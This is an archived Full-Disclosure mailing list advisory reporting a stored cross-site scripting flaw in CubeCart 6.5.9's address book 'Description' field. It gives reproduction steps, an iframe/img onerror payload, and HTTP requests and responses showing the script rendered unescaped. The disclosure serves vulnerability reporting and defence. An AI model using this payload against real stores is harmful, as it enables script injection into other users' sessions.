| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <CAF2Wu1btnheddDmHKos25sQytHJxmQZDrmp9M_U+4XBM2RxQJA@mail.gmail.com> Date: Fri, 30 May 2025 00:04:32 +0100 From: Andrey Stoykov <mwebsec@...il.com> To: fulldisclosure@...lists.org Subject: [FD] Stored XSS in "Description" Functionality - cubecartv6.5.9 # Exploit Title: Stored XSS in "Description" Functionality - cubecartv6.5.9 # Date: 05/2025 # Exploit Author: Andrey Stoykov # Version: 6.5.9 # Tested on: Debian 12 # Blog: https://msecureltd.blogspot.com/ Stored XSS #1: Steps to Reproduce: 1. Visit "Account" > "Address Book" and choose "Edit" 2. In the "Description" parameter enter the following payload <iframe><textarea></iframe><img src="" onerror="alert(document.domain)"> // HTTP POST Request POST /cubecart/index.php?_a=addressbook&action=edit&address_id=1 HTTP/1.1 Host: 192.168.58.186 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:139.0) Gecko/20100101 Firefox/139.0 [...] ------geckoformboundary6f5a64973a1e97b9d4b5c2a0d79601a6 Content-Disposition: form-data; name="description" <iframe><textarea></iframe><img src="" onerror="alert(document.domain)"> ------geckoformboundary6f5a64973a1e97b9d4b5c2a0d79601a6 Content-Disposition: form-data; name="title" [...] // HTTP Response HTTP/1.1 302 Found Date: Sun, 18 May 2025 12:16:17 GMT Server: Apache/2.4.56 (Unix) OpenSSL/1.1.1t PHP/8.2.4 mod_perl/2.0.12 Perl/v5.34.1 X-Frame-Options: SAMEORIGIN X-Powered-By: PHP/8.2.4 X-Frame-Options: SAMEORIGIN Expires: Thu, 19 Nov 1981 08:52:00 GMT [...] // HTTP GET Request GET /cubecart/index.php?_a=addressbook HTTP/1.1 Host: 192.168.58.186 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:139.0) Gecko/20100101 Firefox/139.0 [...] // HTTP Response HTTP/1.1 200 OK Date: Sun, 18 May 2025 12:16:41 GMT Server: Apache/2.4.56 (Unix) OpenSSL/1.1.1t PHP/8.2.4 mod_perl/2.0.12 Perl/v5.34.1 X-Frame-Options: SAMEORIGIN X-Powered-By: PHP/8.2.4 X-Frame-Options: SAMEORIGIN Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: CC_1349B74620=k6fd07i7h211fg1d69p5mvkuru;Expires=Monday, 19-May-2025 12:16:41 UTC;Domain=.192.168.58.186;Path=/cubecart;HttpOnly Vary: Accept-Encoding Content-Length: 42139 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 [...] <div class="small-12 columns"><h5><a href="?_a=addressbook&action=edit&address_id=1"><iframe><textarea></iframe><img src="" onerror="alert(document.domain)"></a></h5></div> [...] _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: https://seclists.org/fulldisclosure/
Powered by blists - more mailing lists